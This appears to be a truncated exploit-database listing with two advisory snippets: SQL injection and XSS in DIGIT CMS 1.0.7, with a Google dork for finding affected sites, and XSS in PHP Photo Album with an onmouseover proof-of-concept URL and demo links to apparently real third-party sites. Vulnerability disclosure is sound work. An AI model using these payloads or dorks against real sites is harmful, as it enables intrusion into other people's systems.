DIGIT CMS 1.0.7 Cross Site Scripting / SQL Injection

Exploit Title: DIGIT Cms SQL Injection / XSS Multiple Vulnerability Date: 2012-01-05 GMT +7 Author: BHG Security Center Software Link: http://www.dig-it.co.il/ Vendor Responses: They didn't respond to the emails. Dork: intext:"Site by DIGIT" Version : 1.0.7 Tested on: ubuntu 11.04 CVE : - Finders...

PHP Photo Album 0.4.1.16 Cross Site Scripting / Disclosure

---------------------------------------------------------------- PHP Photo Album Poc 2 http://localhost/phpAlbum/main.php?cmd=albumnew&keyword=XSS Demo :http://www.iloveazucar.com/phpAlbum/main.php?cmd=albumnew&keyword="onmouseover%3dprompt975554 bad%3d" Demo :http://www.dolfpretorius.com/main.ph...